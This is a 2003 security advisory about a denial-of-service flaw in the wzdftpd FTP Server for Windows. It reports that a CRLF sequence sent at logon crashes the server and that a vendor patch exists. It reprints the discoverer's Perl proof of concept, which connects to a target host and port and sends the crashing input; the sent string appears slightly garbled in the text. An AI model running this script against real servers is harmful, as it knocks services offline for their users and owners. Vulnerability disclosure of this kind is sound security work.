Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
Denial of Service in WZDftpD FTP Server for Windows
A vulnerability in WZDftpD's wzdftpd FTP Server for Windows can result in a Denial of Service (DoS) condition.
Ken Pfeil
September 25, 2003
5 Min Read
Reported September 23, 2003 by Moran Zavdi.
VERSIONS AFFECTED
WZDftpD's wzdftpd FTP Server for Windows
DESCRIPTION
A vulnerability in WZDftpD's wzdftpd FTP Server for Windows can result in a Denial of Service (DoS) condition. Sending a CRLF sequence at logon causes an unhandled exception at the server.
DEMONSTRATION
The discoverer posted the following code as proof of concept: #!/usr/bin/perl
#
# ###############################
# # Proof of concept for #
# # WZDFTPD FTP Server version 0.1rc5 #
# ###############################
#
#http://www.moozatech.com/mt-23-09-2003.txt
#
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
print "#####################################";
print "Proof-Of-Concept for wzdftpd v0.1rc5.";
print "this code is for demonstration only.";
print "Use it under your own responsebility.";
print "#####################################";
if (defined $host && defined $port ) {
} else {
print "Oops, Something is missing.";
die "Usage: perl mooza1.pl [host] [port]";
}
print "Connecting to $host:$port... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant
connect?";
print "OK"; sleep 1; print "Sending Dos.."; sleep 2; print
$socket
"r"; $socket->autoflush(1);
sleep 2;
print "we are done here..";
close($socket);
VENDOR RESPONSE
WZDftpD has released a patch for this vulnerability.
CREDIT
Discovered by Moran Zavdi.
About the Author
You May Also Like
.png?width=700&auto=webp&quality=80&disable=upscale)